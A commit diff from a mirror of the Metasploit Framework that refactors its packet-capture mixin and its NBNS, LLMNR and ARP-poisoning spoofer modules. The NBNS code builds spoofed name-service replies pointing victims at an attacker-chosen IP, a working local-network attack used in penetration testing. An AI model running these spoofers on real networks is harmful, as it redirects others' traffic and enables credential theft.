infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #4827, capture and nbns fixups

bug/bundler_fix sprint-G05
James Lee 2015-03-17 17:37:55 -05:00
parent 47a7f99aae d7fa0ec669
commit bd4738b93e
No known key found for this signature in database
GPG Key ID: 2D6094C7CEA0A321
5 changed files with 190 additions and 163 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

65
lib/msf/core/exploit/capture.rb
View File

@ -42,7 +42,7 @@ module Msf
[ [
true, true,
'Send a TTL=1 random UDP datagram to this host to discover the default gateway\'s MAC', 'Send a TTL=1 random UDP datagram to this host to discover the default gateway\'s MAC',
'www.metasploit.com']), '8.8.8.8']),
OptPort.new('GATEWAY_PROBE_PORT', OptPort.new('GATEWAY_PROBE_PORT',
[ [
false, false,
@ -143,7 +143,6 @@ module Msf
return unless self.capture return unless self.capture
self.capture = nil self.capture = nil
self.arp_capture = nil self.arp_capture = nil
GC.start()
end end
def capture_extract_ies(raw) def capture_extract_ies(raw)
@ -163,26 +162,15 @@ module Msf
end end
# #
# This monstrosity works around a series of bugs in the interrupt # Loop through each packet
# signal handling of Ruby 1.9
# #
def each_packet def each_packet
return unless capture return unless capture
begin @capture_count ||= 0
@capture_count = 0
reader = framework.threads.spawn("PcapReceiver", false) do
capture.each do |pkt| capture.each do |pkt|
yield(pkt) yield(pkt)
@capture_count += 1 @capture_count += 1
end end
end
reader.join
rescue ::Exception
raise $!
ensure
reader.kill if reader.alive?
end
@capture_count @capture_count
end end
@ -242,10 +230,9 @@ module Msf
pcap.inject(pkt) pcap.inject(pkt)
Rex.sleep((delay * 1.0)/1000) Rex.sleep((delay * 1.0)/1000)
end end
GC.start
end end
# Capture_sendto is intended to replace the old Rex::Socket::Ip.sendto method. It requires # capture_sendto is intended to replace the old Rex::Socket::Ip.sendto method. It requires
# a payload and a destination address. To send to the broadcast address, set bcast # a payload and a destination address. To send to the broadcast address, set bcast
# to true (this will guarantee that packets will be sent even if ARP doesn't work # to true (this will guarantee that packets will be sent even if ARP doesn't work
# out). # out).
@ -262,24 +249,20 @@ module Msf
# The return value either be a PacketFu::Packet object, or nil # The return value either be a PacketFu::Packet object, or nil
def inject_reply(proto=:udp, pcap=self.capture) def inject_reply(proto=:udp, pcap=self.capture)
reply = nil # Defaults to ~2 seconds
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0 to = (datastore['TIMEOUT'] * 4) / 1000.0
if not pcap raise RuntimeError, "Could not access the capture process (remember to open_pcap first!)" if not pcap
raise RuntimeError, "Could not access the capture process (remember to open_pcap first!)"
else
begin begin
::Timeout.timeout(to) do ::Timeout.timeout(to) do
pcap.each do |r| pcap.each do |r|
packet = PacketFu::Packet.parse(r) packet = PacketFu::Packet.parse(r)
next unless packet.proto.map { |x| x.downcase.to_sym }.include? proto next unless packet.proto.map { |x| x.downcase.to_sym }.include? proto
reply = packet return packet
break
end end
end end
rescue ::Timeout::Error rescue ::Timeout::Error
end end
end nil
return reply
end end
# This ascertains the correct Ethernet addresses one should use to # This ascertains the correct Ethernet addresses one should use to
@ -328,20 +311,19 @@ module Msf
end end
begin begin
to = (datastore['TIMEOUT'] || 1500).to_f / 1000.0 to = ((datastore['TIMEOUT'] || 500).to_f * 8) / 1000.0
::Timeout.timeout(to) do ::Timeout.timeout(to) do
while (my_packet = inject_reply(:udp, self.arp_capture)) loop do
if my_packet.payload == secret my_packet = inject_reply(:udp, self.arp_capture)
next unless my_packet
next unless my_packet.payload == secret
dst_mac = self.arp_cache[:gateway] = my_packet.eth_daddr dst_mac = self.arp_cache[:gateway] = my_packet.eth_daddr
src_mac = self.arp_cache[Rex::Socket.source_address(addr)] = my_packet.eth_saddr src_mac = self.arp_cache[Rex::Socket.source_address(addr)] = my_packet.eth_saddr
return [dst_mac, src_mac] return [dst_mac, src_mac]
else
next
end
end end
end end
rescue ::Timeout::Error rescue ::Timeout::Error
# Well, that didn't work (this common on networks where there's no gatway, like # Well, that didn't work (this is common on networks where there's no gateway, like
# VMWare network interfaces. We'll need to use a fake source hardware address. # VMWare network interfaces. We'll need to use a fake source hardware address.
self.arp_cache[Rex::Socket.source_address(addr)] = "00:00:00:00:00:00" self.arp_cache[Rex::Socket.source_address(addr)] = "00:00:00:00:00:00"
end end
@ -354,27 +336,32 @@ module Msf
return self.arp_cache[:gateway] unless should_arp? target_ip return self.arp_cache[:gateway] unless should_arp? target_ip
source_ip = Rex::Socket.source_address(target_ip) source_ip = Rex::Socket.source_address(target_ip)
raise RuntimeError, "Could not access the capture process." unless self.arp_capture raise RuntimeError, "Could not access the capture process." unless self.arp_capture
p = arp_packet(target_ip, source_ip) p = arp_packet(target_ip, source_ip)
# Try up to 3 times to get an ARP response
1.upto(3) do
inject_eth(:eth_type => 0x0806, inject_eth(:eth_type => 0x0806,
:payload => p, :payload => p,
:pcap => self.arp_capture, :pcap => self.arp_capture,
:eth_saddr => self.arp_cache[Rex::Socket.source_address(target_ip)] :eth_saddr => self.arp_cache[Rex::Socket.source_address(target_ip)]
) )
begin begin
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0 to = ((datastore['TIMEOUT'] || 500).to_f * 8) / 1000.0
::Timeout.timeout(to) do ::Timeout.timeout(to) do
while (my_packet = inject_reply(:arp, self.arp_capture)) loop do
if my_packet.arp_saddr_ip == target_ip my_packet = inject_reply(:arp, self.arp_capture)
next unless my_packet
next unless my_packet.arp_saddr_ip == target_ip
self.arp_cache[target_ip] = my_packet.eth_saddr self.arp_cache[target_ip] = my_packet.eth_saddr
return self.arp_cache[target_ip] return self.arp_cache[target_ip]
else
next
end
end end
end end
rescue ::Timeout::Error rescue ::Timeout::Error
end end
end end
nil
end
# Creates a full ARP packet, mainly for use with inject_eth() # Creates a full ARP packet, mainly for use with inject_eth()
def arp_packet(target_ip=nil, source_ip=nil) def arp_packet(target_ip=nil, source_ip=nil)

1
lib/msf/core/exploit/ipv6.rb
View File

@ -76,7 +76,6 @@ module Exploit::Remote::Ipv6
return if not @ipv6_icmp6_capture return if not @ipv6_icmp6_capture
@ipv6_icmp6_capture = nil @ipv6_icmp6_capture = nil
GC.start()
end end
# #

1
modules/auxiliary/spoof/arp/arp_poisoning.rb
View File

@ -103,7 +103,6 @@ class Metasploit3 < Msf::Auxiliary
if datastore['LISTENER'] if datastore['LISTENER']
@listener.kill if @listener @listener.kill if @listener
GC.start()
end end
if capture and @spoofing and not datastore['BROADCAST'] if capture and @spoofing and not datastore['BROADCAST']

21
modules/auxiliary/spoof/llmnr/llmnr_response.rb
View File

@ -139,9 +139,7 @@ attr_accessor :sock, :thread
end end
ip_pkt.recalc ip_pkt.recalc
open_pcap
capture_sendto(ip_pkt, rhost.to_s, true) capture_sendto(ip_pkt, rhost.to_s, true)
close_pcap
end end
def monitor_socket def monitor_socket
@ -176,7 +174,10 @@ attr_accessor :sock, :thread
def run def run
check_pcaprub_loaded() check_pcaprub_loaded()
::Socket.do_not_reverse_lookup = true ::Socket.do_not_reverse_lookup = true # Mac OS X workaround
# Avoid receiving extraneous traffic on our send socket
open_pcap({'FILTER' => 'ether host f0:f0:f0:f0:f0:f0'})
# Multicast Address for LLMNR # Multicast Address for LLMNR
multicast_addr = ::IPAddr.new("224.0.0.252") multicast_addr = ::IPAddr.new("224.0.0.252")
@ -191,7 +192,9 @@ attr_accessor :sock, :thread
self.sock = Rex::Socket.create_udp( self.sock = Rex::Socket.create_udp(
# This must be INADDR_ANY to receive multicast packets # This must be INADDR_ANY to receive multicast packets
'LocalHost' => "0.0.0.0", 'LocalHost' => "0.0.0.0",
'LocalPort' => 5355) 'LocalPort' => 5355,
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
)
self.sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1) self.sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
self.sock.setsockopt(::Socket::IPPROTO_IP, ::Socket::IP_ADD_MEMBERSHIP, optval) self.sock.setsockopt(::Socket::IPPROTO_IP, ::Socket::IP_ADD_MEMBERSHIP, optval)
@ -203,12 +206,14 @@ attr_accessor :sock, :thread
add_socket(self.sock) add_socket(self.sock)
while thread.alive? self.thread.join
select(nil, nil, nil, 0.25)
end end
def cleanup
if self.thread and self.thread.alive?
self.thread.kill self.thread.kill
self.sock.close rescue nil self.thread = nil
end
close_pcap
end end
end end

125
modules/auxiliary/spoof/nbns/nbns_response.rb
View File

@ -9,6 +9,9 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Capture include Msf::Exploit::Capture
attr_accessor :sock, :thread
def initialize def initialize
super( super(
'Name' => 'NetBIOS Name Service Spoofer', 'Name' => 'NetBIOS Name Service Spoofer',
@ -44,33 +47,29 @@ class Metasploit3 < Msf::Auxiliary
]) ])
register_advanced_options([ register_advanced_options([
OptBool.new('Debug', [ false, "Determines whether incoming packet parsing is displayed", false]) OptBool.new('DEBUG', [ false, "Determines whether incoming packet parsing is displayed", false])
]) ])
deregister_options('RHOST', 'PCAPFILE', 'SNAPLEN', 'FILTER') deregister_options('RHOST', 'PCAPFILE', 'SNAPLEN', 'FILTER')
self.thread = nil
self.sock = nil
end end
def run def dispatch_request(packet, rhost, src_port)
check_pcaprub_loaded() # Check first since otherwise this is all for naught rhost = ::IPAddr.new(rhost)
# MacOS X workaround # `recvfrom` (on Linux at least) will give us an ipv6/ipv4 mapped
::Socket.do_not_reverse_lookup = true # addr like "::ffff:192.168.0.1" when the interface we're listening
# on has an IPv6 address. Convert it to just the v4 addr
if rhost.ipv4_mapped?
rhost = rhost.native
end
@sock = ::UDPSocket.new() # Convert to string
@sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1) rhost = rhost.to_s
@sock.bind('', 137) # couldn't specify srv host because it missed broadcasts
@run = true spoof = ::IPAddr.new(datastore['SPOOFIP'])
print_status("NBNS Spoofer started. Listening for NBNS requests...") return if packet.length == 0
begin
while @run # Not exactly thrilled we can never turn this off XXX fix this sometime.
packet, addr = @sock.recvfrom(512)
src_port = addr[1]
rhost = addr[3]
break if packet.length == 0
nbnsq_transid = packet[0..1] nbnsq_transid = packet[0..1]
nbnsq_flags = packet[2..3] nbnsq_flags = packet[2..3]
@ -87,9 +86,9 @@ class Metasploit3 < Msf::Auxiliary
nbnsq_type = packet[46..47] nbnsq_type = packet[46..47]
nbnsq_class = packet[48..49] nbnsq_class = packet[48..49]
if (nbnsq_decodedname =~ /#{datastore['REGEX']}/i) return unless nbnsq_decodedname =~ /#{datastore['REGEX']}/i
vprint_good("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} matches regex, responding with #{datastore["SPOOFIP"]}") vprint_good("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} matches regex, responding with #{spoof}")
if datastore['DEBUG'] if datastore['DEBUG']
print_status("transid: #{nbnsq_transid.unpack('H4')}") print_status("transid: #{nbnsq_transid.unpack('H4')}")
@ -118,34 +117,72 @@ class Metasploit3 < Msf::Auxiliary
nbnsq_class+ # Class = IN nbnsq_class+ # Class = IN
"\x00\x04\x93\xe0" + # TTL = a long ass time "\x00\x04\x93\xe0" + # TTL = a long ass time
"\x00\x06" + # Datalength = 6 "\x00\x06" + # Datalength = 6
"\x00\x00" + # Flags B-node, unique = whet ever that means "\x00\x00" + # Flags B-node, unique = whatever that means
datastore['SPOOFIP'].split('.').collect(&:to_i).pack('C*') spoof.hton
open_pcap pkt = PacketFu::UDPPacket.new
pkt.ip_saddr = Rex::Socket.source_address(rhost)
pkt.ip_daddr = rhost
pkt.ip_ttl = 255
pkt.udp_sport = 137
pkt.udp_dport = src_port
pkt.payload = response
pkt.recalc
p = PacketFu::UDPPacket.new capture_sendto(pkt, rhost)
p.ip_saddr = Rex::Socket.source_address(rhost) end
p.ip_daddr = rhost
p.ip_ttl = 255
p.udp_sport = 137
p.udp_dport = src_port
p.payload = response
p.recalc
capture_sendto(p, rhost) def monitor_socket
while true
rds = [self.sock]
wds = []
eds = [self.sock]
r,_,_ = ::IO.select(rds,wds,eds,0.25)
if (r != nil and r[0] == self.sock)
packet, host, port = self.sock.recvfrom(65535)
dispatch_request(packet, host, port)
end
end
end
def run
check_pcaprub_loaded()
::Socket.do_not_reverse_lookup = true # Mac OS X workaround
# Avoid receiving extraneous traffic on our send socket
open_pcap({'FILTER' => 'ether host f0:f0:f0:f0:f0:f0'})
self.sock = Rex::Socket.create_udp(
'LocalHost' => "0.0.0.0",
'LocalPort' => 137,
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
)
add_socket(self.sock)
self.sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
self.thread = Rex::ThreadFactory.spawn("NBNSServerMonitor", false) {
begin
monitor_socket
rescue ::Interrupt
raise $!
rescue ::Exception
print_error("Error: #{$!.class} #{$!} #{$!.backtrace}")
end
}
print_status("NBNS Spoofer started. Listening for NBNS requests with REGEX \"#{datastore['REGEX']}\" ...")
self.thread.join
print_status("NBNS Monitor thread exited...")
end
def cleanup
if self.thread and self.thread.alive?
self.thread.kill
self.thread = nil
end
close_pcap close_pcap
else
vprint_status("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} did not match regex")
end
end end
rescue ::Exception => e
print_error("nbnspoof: #{e.class} #{e} #{e.backtrace}")
# Make sure the socket gets closed on exit
ensure
@sock.close
end
end
end end